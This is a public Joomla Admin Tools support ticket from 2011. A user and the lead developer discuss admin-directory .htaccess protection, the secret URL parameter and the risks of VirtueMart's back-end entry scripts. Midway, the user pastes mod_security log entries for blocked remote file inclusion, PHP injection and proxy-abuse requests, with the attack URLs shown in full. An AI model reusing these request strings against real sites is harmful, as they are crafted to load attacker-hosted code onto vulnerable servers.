Support

Admin Tools

#9830 administrator ,htaccess / virtuemart front end and secret url paramater

Posted in ‘Admin Tools for Joomla! 4 & 5’
This is a public ticket

Everybody will be able to see its contents. Do not include usernames, passwords or any other sensitive information.

Environment Information

Joomla! version
n/a
PHP version
n/a
Admin Tools version
n/a

Latest post by nicholas on Tuesday, 12 April 2011 09:04 CDT

Tuesday, 12 April 2011 05:16 CDT

slaes
Hey Nicholas,

Question re your thoughts on a couple of things.

few points.

- anyone running virtuemart with front end store admin so clients update/change products of their own, cannot with the default htaccess file, created by AT within the administrator dir, do this without the password obviously for the admin directory. This password is probably something most people wont want to provide clients.

- Unfortunately due to the way virtuemart handles front end admin is very poor it calls through the admin dir.

- the work around is modify the .htaccess file within the administrator dir to allow virtuemart exceptions to do its thing. Maybe this is something you might want to include in future release of admin tools as i do believe most people will want client managing virtuemart via front end store admin without providing access to P/W? Your thoughts?

- Other option is to not have a .htaccess within the admin dir which brings me to my next question to you.

- Obviously you have developed both admin dir .htaccess and the secret url parameter. Of course technically they are entirely different however in you opinion, with the secret parameter in place (and you know its strength better than anyone) could one afford to go without the .htacess within the admin dir.

assuming of course the box is tight with regards to directory fishing and etc. Something a .htaccess can at times compensate for.

thanks mate

Tuesday, 12 April 2011 06:13 CDT

nicholas
IMHO, any extension which calls back-end files from the front-end over the web is inherently insecure and shouldn't be used. Well, yeah, there are not many alternatives to VirtueMart, so we'll have to put up with it.

I am not going to implement a back-end password protection exception feature for two reasons:
1. It is not guaranteed to work on all servers (especially those running on Apache 1.3)
2. Adding an exception for an inherently insecure extension completely beats the purpose of securing your administrator area. The reason there is a back-end password protection is to disable hackers from accessing rogue entry point scripts in your site's back-end, which is pretty much what VirtueMart does. Access to rogue scripts is a VERY BAD idea as they don't pass the request through Joomla! and the possibility of having a major vulnerability is very high. Just take a look at VirtueMart's security record and it's an immediate q.e.d. of my point ;)

I would rather have the shop owner either never manage the store from the front-end or have him provide the username and password. After all, he can save the username/password combination to his browser's keychain and not be asked about it all the time.

There is only one problem with that setup that I can think of: the PayPal integration has an IPN callback script inside the administrator area. This is completely stupid. To make it even more stupid, the damn callback script has to be called outside of Joomla!. So, if you want to use PayPal with VirtueMart, you have to screw up your site's security.

While the admin query parameter is an alternative to back-end password protection, it can not protect rogue entry point scripts. It can only handle anything which runs through Joomla!. So, no, using the query string protection will not protect you for potential VirtueMart vulnerabilities.

IMHO, the best solution is to NOT use VirtueMart. It is a security nightmare. VirtueMart and security just don't mix. The only way to use VirtueMart is to consciously downgrade your site's security and expose VirtueMart's plethora of potentially vulnerable, directly accessible scripts to the web.

OK. Next time you hear me say "Friends don't let friends use VirtueMart" you will immediately understand what I have in mind ;)

Nicholas K. Dionysopoulos

Lead Developer and Director

πŸ‡¬πŸ‡·Greek: native πŸ‡¬πŸ‡§English: excellent πŸ‡«πŸ‡·French: basic β€’ πŸ• My time zone is Europe / Athens
Please keep in mind my timezone and cultural differences when reading my replies. Thank you!

Tuesday, 12 April 2011 06:41 CDT

slaes
Your absolutely correct, however the issues is exactly virtuemart and the alternatives. Or for a better word, what alternatives. Anything else is pretty much worse and leaves joomla users with little to no options. Your default .htaccess maker does indeed provide some exceptions to the necessary rules, to function i guess.

On the flip, mod sec and csf with suexec do inndeed provide an excellent solution with regards to remote scripts, it fact they more or less stomp them out completely.

Just for a laugh, here is an example of what i see 400+ times a day.

What advise could you provide those who dont have the luxury of dedicated boxes with custom rule sets?

Moreover without naming and shaming i can think of at least a dozen hosts who claim to be secure, joomla etc etc which have jommla and vmart sites which can be compromised at will. Shame on then, not even having somewhat basics at root level.

/content/info.html//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.lyceum1.net/plugins/ra/logon.txt?? HTTP/1.1

Access denied with code 403 (phase 2). Match of "beginsWith http://%{SERVER_NAME}/" against "MATCHED_VAR" required. [file "/usr/local/apache/conf/modsec/10_asl_rules.conf"] [line "455"] [id "340162"] [rev "193"] [msg "Atomicorp.com - WAF Rules: Remote File Injection attempt in ARGS (AE)"] [data ""] [severity "CRITICAL"]

/////?content=http://teen-37.net/myid.jpg? HTTP/1.1

Access denied with code 403 (phase 2). Match of "beginsWith http://%{SERVER_NAME}/" against "MATCHED_VAR" required. [file "/usr/local/apache/conf/modsec/10_asl_rules.conf"] [line "466"] [id "340026"] [rev "50"] - WAF Rules: PHP Injection attempt in URI"] [data ""] [severity "CRITICAL"]

http://www.ya.ru:80/ HTTP/1.0

Access denied with code 403 (phase 2). Match of "beginsWith http://%{SERVER_NAME}/" against "MATCHED_VAR" required. [file "/usr/local/apache/conf/modsec/10_asl_rules.conf"] [line "102"] [id "340012"] [rev "2"] - WAF Rules: Unauthorized Proxy access attempt"] [data "http:/"] [severity "CRITICAL"]

Tuesday, 12 April 2011 07:02 CDT

nicholas
I'm not talking of remote scripts (RFI - Remote File Inclusion) attacks only. A script which doesn't go through the Joomla! framework may be susceptible to a plethora of attacks such as XSS, local file inclusion, sensitive information disclosure, SQL injection and the list goes on forever... But you are right. There are no good alternatives for Joomla! or, better said, there are no free alternatives for Joomla!. redShop does much more than VM but it costs if you want the full feature set. Tienda is shaping up to be a very solid contestant, but it's at least 1-2 years from achieving that goal. There are other cart applications but, well, they're not even comparable to VM.

Regarding the proxy requests you listed above, mod_security is the best approach. You can try writing a whole encyclopaedia of .htaccess rules, but they will slow down the site to a screeching halt.

And I fully agree with you, there are only a handful of secure hosts. The downside is that they're more expensive and people, unfortunately, still think with their wallets instead of with their heads. For instance, one very popular and very slow, insecure and bad host wouldn't be around if people would go "hey, this guy offers 100x the storage and bandwidth of the other guys in a quarter of the price; that can't be right". And right it ain't. As any old timer will tell you, you only get what you pay for. If you pay for crappy hosting that's exactly what you gonna get. Oh, well... We can't save them all. At least we can save ourselves and our clients ;)

Nicholas K. Dionysopoulos

Lead Developer and Director

πŸ‡¬πŸ‡·Greek: native πŸ‡¬πŸ‡§English: excellent πŸ‡«πŸ‡·French: basic β€’ πŸ• My time zone is Europe / Athens
Please keep in mind my timezone and cultural differences when reading my replies. Thank you!

Tuesday, 12 April 2011 07:15 CDT

slaes
your absolutely correct man, the joys of it all man. heaven cant help those who dont try to learn a little and understand as much as reasonable possible.

the saddest part of all is the 99.9% of attackes can be prevented with basics, the hosts just dont care and will more often than not blame account holders instead.

If someone is putting together a specific attack, have backups and run for the hills, i'll say.

Tuesday, 12 April 2011 09:04 CDT

nicholas
Yes, that last line really sums it up nicely! If a real hacker puts you on his sights, all you can do is have backups and pray - unless you're a high profile governmental organisation who can afford a top notch security team, in which case you might contain the damage.

Nicholas K. Dionysopoulos

Lead Developer and Director

πŸ‡¬πŸ‡·Greek: native πŸ‡¬πŸ‡§English: excellent πŸ‡«πŸ‡·French: basic β€’ πŸ• My time zone is Europe / Athens
Please keep in mind my timezone and cultural differences when reading my replies. Thank you!

Support Information

Working hours: We are open Monday to Friday, 9am to 7pm Cyprus timezone (EET / EEST). Support is provided by the same developers writing the software, all of which live in Europe. You can still file tickets outside of our working hours, but we cannot respond to them until we're back at the office.

Support policy: We would like to kindly inform you that when using our support you have already agreed to the Support Policy which is part of our Terms of Service. Thank you for your understanding and for helping us help you!